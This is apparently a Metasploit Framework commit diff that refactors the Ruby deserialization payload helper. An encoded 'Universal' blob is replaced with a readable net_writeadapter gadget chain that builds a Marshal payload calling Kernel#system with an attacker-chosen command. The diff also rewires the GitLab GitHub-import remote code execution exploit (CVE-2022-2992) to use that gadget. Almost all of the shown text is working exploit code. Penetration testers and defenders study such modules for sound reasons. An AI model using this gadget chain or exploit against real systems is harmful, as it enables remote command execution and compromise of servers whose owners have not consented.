It made the gadgets being used more readable

lib/msf/core/exploit/ruby_deserialization.rb

@@ -13,7 +13,7 @@ module Msf
     # @param [String] command The OS command to execute.
     #
     # @return [String] The opaque data blob.
-    def generate_ruby_deserialization_for_command(command, name = 'Universal')
+    def generate_ruby_deserialization_for_command(command, name)
       Msf::Util::RubyDeserialization.payload(name, command)
     end
 
@@ -27,7 +27,7 @@ module Msf
     #   operating system command.
     #
     # @return [String] The opaque data blob.
-    def generate_ruby_deserialization_for_payload(payload, name = 'Universal')
+    def generate_ruby_deserialization_for_payload(payload, name)
       command = nil
 
       if payload.platform.platforms == [Msf::Module::Platform::Windows]

lib/msf/util/ruby_deserialization.rb

@@ -6,33 +6,23 @@ module Msf
     # Ruby deserialization class
     class RubyDeserialization
       # That could be in the future a list of payloads used to exploit the Ruby deserialization vulnerability.
-      # TODO: Add more payloads
-      # TDOO: Create a json file with the payloads?
       PAYLOADS = {
-        'Universal' => {
-          'status' => 'dynamic',
-          'length_offset' => 309,
-          'buffer_offset' => 310,
-          # https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.html
-          'bytes' => 'BAhbCGMVR2VtOjpTcGVjRmV0Y2hlcmMTR2VtOjpJbnN0YWxsZXJVOhVHZW06OlJlcXVpcmVtZW50WwZvOhxHZW06OlBhY2thZ2U6OlRhclJlYWRlcgY6CEBpb286FE5ldDo6QnVmZmVyZWRJTwc7B286I0dlbTo6UGFja2FnZTo6VGFyUmVhZGVyOjpFbnRyeQc6CkByZWFkaQA6DEBoZWFkZXJJIhlTR1Y1WkdWeVFXNWtjbUZrWlNBZwY6BkVUOhJAZGVidWdfb3V0cHV0bzoWTmV0OjpXcml0ZUFkYXB0ZXIHOgxAc29ja2V0bzoUR2VtOjpSZXF1ZXN0U2V0BzoKQHNldHNvOw4HOw9tC0tlcm5lbDoPQG1ldGhvZF9pZDoLc3lzdGVtOg1AZ2l0X3NldEkiBQY7DFQ7EjoMcmVzb2x2ZQ=='
-        }
-      }.freeze
+        # https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.html
+        net_writeadapter: proc do |command|
+          "\x04\b[\bc\x15Gem::SpecFetcherc\x13Gem::InstallerU:\x15Gem::Requirement" \
+          "[\x06o:\x1CGem::Package::TarReader\x06:\b@ioo:\x14Net::BufferedIO\a;\ao:" \
+          "#Gem::Package::TarReader::Entry\a:\n@readi\x00:\f@headerI#{Marshal.dump(Rex::Text.rand_text_alphanumeric(12..20))[2..-1]}" \
+          "\x06:\x06ET:\x12@debug_outputo:\x16Net::WriteAdapter\a:\f@socketo:\x14" \
+          "Gem::RequestSet\a:\n@setso;\x0E\a;\x0Fm\vKernel:\x0F@method_id:\vsystem:\r" \
+          "@git_setI#{Marshal.dump(command)[2..-1]}\x06;\fT;\x12:\fresolve"
+        end
+      }
 
       def self.payload(payload_name, command = nil)
-        payload = PAYLOADS[payload_name]
 
-        raise ArgumentError, "#{payload_name} payload not found in payloads" if payload.nil?
+        raise ArgumentError, "#{payload_name} payload not found in payloads" unless payload_names.include? payload_name.to_sym
 
-        bytes = Rex::Text.decode_base64(payload['bytes'])
-
-        length = [command.length.ord + 5 ].pack('C*')
-
-        bytes[payload['buffer_offset'] - 1] += command
-        bytes[payload['length_offset']] = length
-
-        bytes.gsub!('SGV5ZGVyQW5kcmFkZSAg', Rex::Text.rand_text_alphanumeric(20))
-
-        bytes
+        PAYLOADS[payload_name.to_sym].call(command)
       end
 
       def self.payload_names

modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb

@@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def redis_payload(cmd)
-    serialized_payload = generate_ruby_deserialization_for_command(cmd)
+    serialized_payload = generate_ruby_deserialization_for_command(cmd, :net_writeadapter)
     gitlab_session_id = "session:gitlab:#{session_id}"
     # A RESP array of 3 elements (https://redis.io/docs/reference/protocol-spec/)
     # The command set